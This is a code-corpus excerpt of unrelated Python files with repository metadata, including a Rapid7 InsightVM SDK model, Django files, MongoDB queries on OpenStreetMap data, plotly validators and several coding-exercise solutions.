and the available operators for vSphere connections: | Field | Operators | | -------------------- | ------------------------------------------------------------------------------------------ | | `cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `data-center` | `is` ` is-not` | | `discovered-time` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `guest-os-family` | `contains` ` does-not-contain` | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `power-state` | `in` ` not-in` | | `resource-pool-path` | `contains` ` does-not-contain` | | `last-time-seen` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vm` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Enumerated Properties (vSphere) The following fields have enumerated values: | Field | Acceptable Values | | ------------- | ------------------------------------ | | `power-state` | `poweredOn` `poweredOff` `suspended` | ## HATEOAS This API follows Hypermedia as the Engine of Application State (HATEOAS) principals and is therefore hypermedia friendly. Hyperlinks are returned in the `links` property of any given resource and contain a fully-qualified hyperlink to the corresponding resource. The format of the hypermedia link adheres to both the <a target=\"_blank\" href=\"http://jsonapi.org\">{json:api} v1</a> <a target=\"_blank\" href=\"http://jsonapi.org/format/#document-links\">\"Link Object\"</a> and <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html\">JSON Hyper-Schema</a> <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html#rfc.section.5.2\">\"Link Description Object\"</a> formats. For example: ```json \"links\": [{ \"rel\": \"<relation>\", \"href\": \"<href>\" ... }] ``` Where appropriate link objects may also contain additional properties than the `rel` and `href` properties, such as `id`, `type`, etc. See the [Root](#tag/Root) resources for the entry points into API discovery. # noqa: E501
OpenAPI spec version: 3
Contact: support@rapid7.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from py_insightvm_sdk.models.swagger_discovery_search_criteria_filter import SwaggerDiscoverySearchCriteriaFilter # noqa: F401,E501
class DiscoverySearchCriteria(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'connection_type': 'str',
'filters': 'list[SwaggerDiscoverySearchCriteriaFilter]',
'match': 'str'
}
attribute_map = {
'connection_type': 'connectionType',
'filters': 'filters',
'match': 'match'
}
def __init__(self, connection_type=None, filters=None, match=None): # noqa: E501
"""DiscoverySearchCriteria - a model defined in Swagger""" # noqa: E501
self._connection_type = None
self._filters = None
self._match = None
self.discriminator = None
if connection_type is not None:
self.connection_type = connection_type
if filters is not None:
self.filters = filters
if match is not None:
self.match = match
@property
def connection_type(self):
"""Gets the connection_type of this DiscoverySearchCriteria. # noqa: E501
The type of discovery connection configured for the site. This property only applies to dynamic sites. # noqa: E501
:return: The connection_type of this DiscoverySearchCriteria. # noqa: E501
:rtype: str
"""
return self._connection_type
@connection_type.setter
def connection_type(self, connection_type):
"""Sets the connection_type of this DiscoverySearchCriteria.
The type of discovery connection configured for the site. This property only applies to dynamic sites. # noqa: E501
:param connection_type: The connection_type of this DiscoverySearchCriteria. # noqa: E501
:type: str
"""
allowed_values = ["activesync-ldap", "activesync-office365", "activesync-powershell", "aws", "dhcp", "sonar", "vsphere"] # noqa: E501
if connection_type not in allowed_values:
raise ValueError(
"Invalid value for `connection_type` ({0}), must be one of {1}" # noqa: E501
.format(connection_type, allowed_values)
)
self._connection_type = connection_type
@property
def filters(self):
"""Gets the filters of this DiscoverySearchCriteria. # noqa: E501
Filters used to match assets from a discovery connection. See <a href=\"#section/Responses/DiscoverySearchCriteria\">Discovery Connection Search Criteria</a> for more information on the structure and format. # noqa: E501
:return: The filters of this DiscoverySearchCriteria. # noqa: E501
:rtype: list[SwaggerDiscoverySearchCriteriaFilter]
"""
return self._filters
@filters.setter
def filters(self, filters):
"""Sets the filters of this DiscoverySearchCriteria.
Filters used to match assets from a discovery connection. See <a href=\"#section/Responses/DiscoverySearchCriteria\">Discovery Connection Search Criteria</a> for more information on the structure and format. # noqa: E501
:param filters: The filters of this DiscoverySearchCriteria. # noqa: E501
:type: list[SwaggerDiscoverySearchCriteriaFilter]
"""
self._filters = filters
@property
def match(self):
"""Gets the match of this DiscoverySearchCriteria. # noqa: E501
Operator to determine how to match filters. `all` requires that all filters match for an asset to be included. `any` requires only one filter to match for an asset to be included. # noqa: E501
:return: The match of this DiscoverySearchCriteria. # noqa: E501
:rtype: str
"""
return self._match
@match.setter
def match(self, match):
"""Sets the match of this DiscoverySearchCriteria.
Operator to determine how to match filters. `all` requires that all filters match for an asset to be included. `any` requires only one filter to match for an asset to be included. # noqa: E501
:param match: The match of this DiscoverySearchCriteria. # noqa: E501
:type: str
"""
allowed_values = ["any", "all"] # noqa: E501
if match not in allowed_values:
raise ValueError(
"Invalid value for `match` ({0}), must be one of {1}" # noqa: E501
.format(match, allowed_values)
)
self._match = match
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DiscoverySearchCriteria, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DiscoverySearchCriteria):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"greenpau@outlook.com"
] |
greenpau@outlook.com
|
82a746e5f60cd833d1722b8ad31c9a47ba6d461b
|
c1cadf7816acbe2c629dfdf5bfe8f35fa14bfd57
|
/archieve/chinese/manage.py
|
5ca0b7c52363f11fa49628eb6fd16998188a8760
|
[] |
no_license
|
luochengleo/timeperception
|
39c5eb0b0cedf16a02867e6a67e2befc4a118c71
|
6c27ceb51e219d9f18898918d4f3158c94836ff4
|
refs/heads/master
| 2021-01-21T04:46:45.315679
| 2016-07-21T14:34:04
| 2016-07-21T14:34:04
| 43,635,809
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "timeperception.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"luochengleo@gmail.com"
] |
luochengleo@gmail.com
|
c30b0daa268e1d472d04f23d05a26aa61c656f59
|
3f84f51751c4191bb81c9df7094578461fb12a2d
|
/典型90問/012_dfs.py
|
ab1e4b903f8a68201dac254f3a00b79daee48b9e
|
[] |
no_license
|
rikukawamura/atcoder
|
7ff49f1bd8534b99d87fe81ef950e1ba77eee8b8
|
09c0cfe3ce25be56d338614a29e996f4106117cd
|
refs/heads/master
| 2023-08-13T21:21:19.058219
| 2021-09-28T10:02:42
| 2021-09-28T10:02:42
| 329,206,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 896
|
py
|
def int_sp():
return map(int, input().split())
def li_int_sp():
return list(map(int, input().split()))
def dfs(s_y, s_x):
if s_y<0 or H<=s_y or s_x<0 or W<=s_x or visited[s_y][s_x] or maps[s_y][s_x]==0:
return
visited[s_y][s_x] = 1
for k in range(4):
dfs(s_y+dy[k], s_x+dx[k])
import pdb
import sys
sys.setrecursionlimit(10**8)
H, W = int_sp()
Q = int(input())
maps = [[0]*W for _ in range(H)]
visited = [[0] * W for _ in range(H)]
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
for _ in range(Q):
#pdb.set_trace()
q = li_int_sp()
if q[0] == 1:
maps[q[1]-1][q[2]-1] = 1
else:
start_y, start_x = q[1], q[2]
goal_y, goal_x = q[3], q[4]
dfs(start_y-1, start_x-1)
if visited[goal_y-1][goal_x-1] == 1:
print('Yes')
else:
print('No')
visited = [[0]*W for _ in range(H)]
|
[
"49993650+rikukawamura@users.noreply.github.com"
] |
49993650+rikukawamura@users.noreply.github.com
|
f5ce0b8c0c2a1214e2899cfff23ea25f55ac12b1
|
c546184629526cff0d40180fc89158ea70c5e21c
|
/Basics of data science and machine learning/5. Tuples, Dictionary and sets/8. Pairs with difference K.py
|
68f7a31e266ceb68ab10d834ada99cfcc13e1541
|
[] |
no_license
|
code-drops/coding-ninjas
|
23ad5d3ea813caf3bd1b04a3733b38d3fb844669
|
fd320e1e4f9e996fbe8d2ef25b20d818b18d4d79
|
refs/heads/master
| 2022-11-23T00:22:31.791976
| 2020-07-05T10:22:00
| 2020-07-05T10:22:00
| 277,277,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 825
|
py
|
'''
You are given with an array of integers and an integer K. Write a program to find and print all pairs which have difference K.
Take difference as absolute.
'''
def printPairDiffK(List, k):
# Please add your code here
dict = {}
count, itm = 0, ''
for item in reversed(List):
dict[item] = dict.get(item, 0) + 1
# print(dict)
for i in dict:
# print(i)
if i+k in dict:
for m in range(dict[i]):
for n in range(dict[i+k]):
print(i,i+k)
if i-k in dict:
for m in range(dict[i]):
for n in range(dict[i-k]):
print(i-k,i)
dict[i] = 0
# Main
n=int(input())
l=list(int(i) for i in input().strip().split(' '))
k=int(input())
printPairDiffK(l, k)
|
[
"noreply@github.com"
] |
code-drops.noreply@github.com
|
c7be3292d0f7692e0324adf082264120fa54122f
|
8c87224eb6d2935a6d10bff39f8592a1dd43f549
|
/data_overview.py
|
c5b91d99da176f1a06a9543f44356e24da0112eb
|
[] |
no_license
|
charano/data-wrangle-openstreetmaps-data_1
|
ca3024d78acaf80e85ae3c66a1eee9b72dd6c899
|
59458dff3e1b05216b259b4bcf07da32e28abb57
|
refs/heads/master
| 2021-01-10T13:28:59.052062
| 2015-06-06T16:58:10
| 2015-06-06T16:58:10
| 36,987,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,190
|
py
|
import pprint
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def zip_pipeline():
pipeline = [{"$match" : { "address.postcode" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.postcode",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def city_pipeline():
pipeline = [{"$match" : { "address.city" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.city",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def school_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "school"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def college_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "college"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def university_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "university"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":25}
]
return pipeline
def one_time_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":1}
]
return pipeline
def top_amenities_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}}}
,{"$group" : {"_id" : "$amenity", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":100}
]
return pipeline
def top_religions_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "place_of_worship"}}
,{"$group" : {"_id" : "$religion", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":20}
]
return pipeline
def marietta_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Marietta"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def decatur_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Decatur"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def timestamp_pipeline():
pipeline = [{"$group" : {"_id" : {"year" : {"$year" : "$created.timestamp"}},
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('test')
#Number of documents
count_result = db.atlanta.find().count()
print 'Number of documents'
pprint.pprint(count_result)
#Number of nodes
nodes_result = db.atlanta.find({"type":"node"}).count()
print 'Number of nodes'
pprint.pprint(nodes_result)
#Number of ways
ways_result = db.atlanta.find({"type":"way"}).count()
print 'Number of ways'
pprint.pprint(ways_result)
#Number of unique users
users_result = len(db.atlanta.distinct("created.user"))
print 'Number of unique users'
pprint.pprint(users_result)
#Top 1 contributing user
top_user_pipeline = top_user_pipeline()
top_user_result = db.atlanta.aggregate(top_user_pipeline)
print 'Top contributor'
pprint.pprint(top_user_result)
#Zipcodes
zip_pipeline = zip_pipeline()
zip_result = db.atlanta.aggregate(zip_pipeline)
print 'Zipcodes'
pprint.pprint(zip_result)
#Cities
city_pipeline = city_pipeline()
city_result = db.atlanta.aggregate(city_pipeline)
print 'Cities'
pprint.pprint(city_result)
#Top amenities
top_amenities_pipeline = top_amenities_pipeline()
amenity_result = db.atlanta.aggregate(top_amenities_pipeline)
print 'Amenities'
pprint.pprint(amenity_result)
#Top religions
top_religions_pipeline = top_religions_pipeline()
top_religions_result = db.atlanta.aggregate(top_religions_pipeline)
print 'Top Religions'
pprint.pprint(top_religions_result)
#Top cuisines
top_cuisines_pipeline = top_cuisines_pipeline()
top_cuisines_result = db.atlanta.aggregate(top_cuisines_pipeline)
print 'Top Cuisines'
pprint.pprint(top_cuisines_result)
#Marietta cuisines
marietta_cuisines_pipeline = marietta_cuisines_pipeline()
marietta_cuisines_result = db.atlanta.aggregate(marietta_cuisines_pipeline)
print 'Marietta Cuisines'
pprint.pprint(marietta_cuisines_result)
#Decatur cuisines
decatur_cuisines_pipeline = decatur_cuisines_pipeline()
decatur_cuisines_result = db.atlanta.aggregate(decatur_cuisines_pipeline)
print 'Decatur Cuisines'
pprint.pprint(decatur_cuisines_result)
#Schools
school_pipeline = school_pipeline()
school_result = db.atlanta.aggregate(school_pipeline)
print 'Schools'
pprint.pprint(school_result)
#Colleges
college_pipeline = college_pipeline()
college_result = db.atlanta.aggregate(college_pipeline)
print 'Colleges'
pprint.pprint(college_result)
#Universities
university_pipeline = university_pipeline()
university_result = db.atlanta.aggregate(university_pipeline)
print 'Universities'
pprint.pprint(university_result)
#Number of records created every year
timestamp_pipeline = timestamp_pipeline()
timestamp_result = db.atlanta.aggregate(timestamp_pipeline)
print 'Number of records created/year'
pprint.pprint(timestamp_result)
|
[
"root@ip-10-47-174-141.ec2.internal"
] |
root@ip-10-47-174-141.ec2.internal
|
934e170f6ff5c24743b86be8f724a5ba2956c4f5
|
4410498f2af839d5d086e2a57d7faadb372bba7c
|
/twitterOA1.py
|
a86365d4d0ebcfe3084d7f44847c804675e3c214
|
[] |
no_license
|
Huijuan2015/MyLeetcodeSolutions
|
264e68c4748caac9fc9a4dc3347ae8eae7241217
|
6d4d078db8f3e6994db0dc25410be265459acc04
|
refs/heads/master
| 2020-04-06T05:14:29.103116
| 2016-11-05T21:57:27
| 2016-11-05T21:57:27
| 53,628,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,420
|
py
|
import sys
from string import maketrans
def mask_email(email):
body = email[2:].strip()
at = body.find('@')
return 'E:' + body[0] + '*' * 5 + body[at-1:]
def mask_phone(phone):
body = phone[2:].strip()
table = maketrans('', '')
body = body.translate(table, '- ()')
# print body
if body[0] == '+':
start = '+'
body = body[1:]
mid = '-***-***-'
else:
start = ''
mid = '***-***-'
starts = '*' * (len(body) - 10)
return 'P:' + start + starts + mid + phone[-4:]
for line in sys.stdin.readlines():
line = line.strip()
if line[0] == 'E':
print mask_email(line)
else:
print mask_phone(line)
---------
import sys
from string import maketrans
def simplify(exp):
if type(exp) == list:
first = True
nlist = []
for i in xrange(len(exp)):
if type(exp[i]) == list:
if first:
nlist.extend(simplify(exp[i]))
first = False
else:
nlist.append(simplify(exp[i]))
else:
nlist.append(exp[i])
return nlist
else:
return [exp]
def reverse(exp):
if type(exp) == list:
exp = exp[::-1]
for i in xrange(len(exp)):
exp[i] = reverse(exp[i])
return exp
return exp
def parse(s):
s = s.translate(maketrans('', ''), ' ')
expstr, cmds = s.split('/')
cmds = cmds.strip()
ncmds = []
prevS = ''
for cmd in cmds:
if cmd == 'R' or (cmd == 'S' and prevS != cmd):
ncmds.append(cmd)
prevS = cmd
result = []
stack = [result]
for s in expstr:
if s == '(':
stack[-1].append([])
stack.append(stack[-1][-1])
elif s == ')':
stack.pop()
else:
stack[-1].append(s)
return result, ncmds
def extract(exp):
if type(exp) == list:
return '(' + ''.join(map(extract, exp)) + ')'
else:
return exp
# a = [
# # 'A/',
# # 'A B /S',
# # '(AB) C((DE)F)/ R',
# # '(AB) C((DE)F)/ RR',
# '(AB) C((DE)F)/ SSS',
# ]
for line in sys.stdin.readlines():
# for line in a:
exp, cmds = parse(line)
for cmd in cmds:
if cmd == 'S':
exp = simplify(exp)
else:
exp = reverse(exp)
print extract(exp)[1:-1]
|
[
"huijuan1991@hotmail.com"
] |
huijuan1991@hotmail.com
|
47a910a99248290f1384e97ff25bd0b69c23469d
|
bfee538514b48b3f83873c671e4bcaadf0744d69
|
/api/migrations/0001_initial.py
|
bd0b5cfbddd5550b74916de712000ea67229a801
|
[] |
no_license
|
visheshdubey/Dashbike
|
204d9d8411e5afdf0b176b460470a1c6608b52f1
|
5dcb7f5d449034c61ef7dcdef246fbf4209e9e15
|
refs/heads/master
| 2023-07-27T11:35:36.071871
| 2021-09-12T03:03:01
| 2021-09-12T03:03:01
| 178,920,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,175
|
py
|
# Generated by Django 2.1.7 on 2019-04-06 05:49
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Bike',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bike_name', models.CharField(default='type..', max_length=500)),
('image', models.ImageField(default='def.jpg', upload_to=api.models.scramble_uploaded_filename, verbose_name='media')),
('thumbnail', models.ImageField(blank=True, default='defthumb.jpg', upload_to='', verbose_name='Thumbnail of uploaded image')),
],
),
migrations.CreateModel(
name='BikeModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(default='type..', max_length=500)),
('count', models.IntegerField(default=0)),
('bike_rate_hr', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_h', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_f', models.CharField(blank=True, max_length=500, null=True)),
('bike_isAvailable', models.BooleanField(default=True)),
('isActive', models.BooleanField(default=True)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='api.Bike')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
migrations.CreateModel(
name='Booking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pickup_time', models.DateTimeField(default=None)),
('dob', models.DateTimeField(default=None)),
('duration', models.CharField(default=0.0, max_length=500)),
('transaction_amt', models.CharField(default=0.0, max_length=500)),
('ord_id', models.CharField(default=0.0, max_length=500)),
('transaction_id', models.CharField(default=0.0, max_length=500)),
('is_accepted', models.BooleanField(default=False)),
('is_cancelled', models.BooleanField(default=False)),
('is_Booked', models.BooleanField(default=False)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='api.BikeModel')),
('client', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.ClientDetail')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
]
|
[
"you@example.com"
] |
you@example.com
|
5740cc781e591bcf9a64ae8aec6619af8f1be9d9
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/plotly/py2/plotly/validators/sankey/node/hoverlabel/__init__.py
|
97dbaf78fea9dc475698f08381ca03fa4d8e4827
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 6,073
|
py
|
import _plotly_utils.basevalidators
class NamelengthsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="namelengthsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(NamelengthsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class NamelengthValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="namelength", parent_name="sankey.node.hoverlabel", **kwargs
):
super(NamelengthValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", -1),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class FontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="font", parent_name="sankey.node.hoverlabel", **kwargs
):
super(FontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Font"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for family .
size
sizesrc
Sets the source reference on Chart Studio Cloud
for size .
""",
),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="bordercolorsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(BordercolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="alignsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="align", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", ["left", "right", "auto"]),
**kwargs
)
|
[
"robot-piglet@yandex-team.com"
] |
robot-piglet@yandex-team.com
|
6f1688c722ecdbc98b0e43a88f1b44403696a034
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/49/usersdata/91/18060/submittedfiles/pico.py
|
24ae75a9ef09d94bf4615d5fc052c73af71e91f6
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 573
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def pico(lista):
posicao=0
for i in range (0,len(lista)-1,1):
if lista[i]>lista[i+1]:
posicao=i
break
cont=0
for i in range (posicao,len(lista)-1,1):
if lista[i]<lista[i+1]:
cont+=1
if cont==0 and posicao!=0:
return True
else:
return False
n = input('Digite a quantidade de elementos da lista: ')
a=[]
for i in range (0,n,1):
a.append(input('digite a:'))
if pico(a):
print('S')
else:
print('N')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
993a6ea2459e638208fb80cbeb1277f085d2f971
|
6a433931dd544e2d9f2b18cff3ce096531b15941
|
/for_loop_sum.py
|
0e496fc2e9d34c9c258fd6d3f0dd3dbb769d5d3d
|
[] |
no_license
|
lunatic-7/python_course_noob-git-
|
b7de1d988c91fd017b645fb1e227e207f3b12b15
|
5e06442151e7a94449ce99158855a608eb035319
|
refs/heads/main
| 2023-08-04T06:55:05.473812
| 2021-09-18T17:20:49
| 2021-09-18T17:20:49
| 407,922,569
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
# sum from 1 to 10
# 1 + 2 + 3 + ............. 10
# total = 0
# for i in range(1,11):
# total += i
# print(total)
# take input from user.
n = int(input("enter a number : "))
total = 0
for i in range(1,n+1):
total += i
print(total)
|
[
"wasif1607@gmail.com"
] |
wasif1607@gmail.com
|
944943ff2bf8b9572fd17ce34f32c985818858d4
|
69b93223fc6794123269022a02e5a1dcf130e698
|
/81_Search_in_Rotated_Sorted_Array_II.py
|
880660e9f25e4a6c94f1ec6ef80ea37cb6c242c8
|
[] |
no_license
|
GuangyuZheng/leet_code_python
|
43b984ce98cc889a7e07151004d347cb03b2d9b2
|
266def94df8245f90ea5b6885fc472470b189e51
|
refs/heads/master
| 2020-09-05T18:12:07.649374
| 2020-02-22T09:37:59
| 2020-02-22T09:37:59
| 220,177,486
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 780
|
py
|
from typing import List
class Solution:
def search(self, nums: List[int], target: int) -> bool:
n = len(nums)
start, end = 0, n-1
while start <= end:
mid = (start + end)//2
if nums[mid] == target:
return True
if nums[start] == nums[mid] == nums[end]:
start += 1
end -= 1
continue
if nums[start] <= nums[mid]:
if nums[start] <= target < nums[mid]:
end = mid - 1
else:
start = mid + 1
else:
if nums[mid] < target <= nums[end]:
start = mid + 1
else:
end = mid - 1
return False
|
[
"583621555@qq.com"
] |
583621555@qq.com
|
37ff904c75ff61fe30e0c84cb5bae9b4da25e2d2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_207/445.py
|
